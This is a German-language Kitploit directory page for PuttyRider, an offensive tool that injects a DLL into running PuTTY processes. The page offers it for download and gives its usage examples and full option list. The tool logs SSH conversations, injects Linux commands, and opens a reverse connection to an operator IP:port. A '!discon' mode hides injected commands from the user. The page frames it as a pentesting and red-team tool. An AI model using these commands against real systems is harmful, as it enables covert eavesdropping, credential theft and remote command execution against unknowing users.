Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
PuttyRider — Putty-Sitzungen kapern, um Gespräche abzuhören und Linux-Befehle einzuschleusen. | Kitploit
Tools/GitHubGitHub/seastorm/puttyrider
Laterale BewegungPenetrationstestsCommand and ControlRed TeamingRemote-Access-Tool
GitHubseastorm/puttyrider

PuttyRider

Putty-Sitzungen kapern, um Gespräche abzuhören und Linux-Befehle einzuschleusen.

Repository anzeigen
36673vor 11 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

PuttyRider

Kapern Sie Putty-Sitzungen, um die Kommunikation zu belauschen und Linux-Befehle einzuschleusen.

Herunterladen

PuttyRider-bin.zip

Dokumentation

  • Defcamp 2014 Präsentation - PDF
  • Defcamp 2014 Präsentation - Video

Beispiele

Listet vorhandene Putty-Prozesse und deren Status (injiziert / nicht injiziert) auf.

root@kitploit:~
PuttyRider.exe -l

Injiziert die DLL in das erste gefundene putty.exe und initiiert eine Rückverbindung von der DLL zu meiner IP:Port, dann beendet PuttyRider.exe.

root@kitploit:~
PuttyRider.exe -p 0 -r 192.168.0.55:8080

Wird im Hintergrund ausgeführt und wartet auf neue Putty-Prozesse. Injiziert in jedes neue putty.exe und schreibt alle Gespräche in lokale Dateien.

root@kitploit:~
PuttyRider.exe -w -f

Entfernt PuttyRider.dll aus allen Putty-Prozessen, in die sie bereits injiziert wurde. (Vergiss nicht, PuttyRider.exe zu beenden, wenn es im -w-Modus läuft, sonst wird es erneut injizieren.)

root@kitploit:~
PuttyRider.exe -x

Verwendung

root@kitploit:~
Betriebsmodi:
	-l		Listet die laufenden Putty-Prozesse und ihre Verbindungen auf
	-w		Injiziert in alle bestehenden Putty-Sitzungen und wartet auf neue Sitzungen,
			um auch dort zu injizieren
	-p PID  Injiziert nur in die bestehende Putty-Sitzung, die durch PID identifiziert wird.
			Wenn PID==0, wird in die erste gefundene Putty injiziert
	-x		Bereinigen. Entfernt die DLL aus allen laufenden Putty-Instanzen
	-d		Debug-Modus. Funktioniert nur mit -p-Modus
	-c CMD  Führt nach erfolgreicher Injektion automatisch einen Linux-Befehl aus
			PuttyRider entfernt nachgestellte Leerzeichen und das Zeichen '&' aus CMD
			PuttyRider fügt hinzu: " 1>/dev/null 2>/dev/null &" an CMD
	-h		Diese Hilfe anzeigen

Ausgabemodi:
	-f			Schreibt die gesamte Putty-Kommunikation in eine Datei im lokalen Verzeichnis.
				Der Dateiname enthält die PID des aktuellen putty.exe
	-r IP:PORT	Initiiert eine Rückverbindung zur angegebenen Maschine und
				startet eine interaktive Sitzung.

Interaktive Befehle (nach Erhalt einer Rückverbindung):
	!status		Überprüft, ob das Putty-Fenster mit Benutzereingaben verbunden ist
	!discon		Trennt das Haupt-Putty-Fenster, sodass es nichts mehr anzeigt
				Dies ist nützlich, um Befehle zu senden, ohne dass der Benutzer es bemerkt
	!recon		Verbinde das Putty-Fenster wieder mit dem normalen Betriebsmodus
	CMD			Linux-Shell-Befehle
	!exit		Beendet diese Verbindung
	!help		Zeigt Hilfe für die Client-Verbindung an

Kompilieren

Verwenden Sie die Visual Studio-Eingabeaufforderung:

root@kitploit:~
nmake main dll

Danksagungen

Dank an Brett Moore von Insomnia Security für seinen Proof-of-Concept PuttyHijack

Tool herunterladen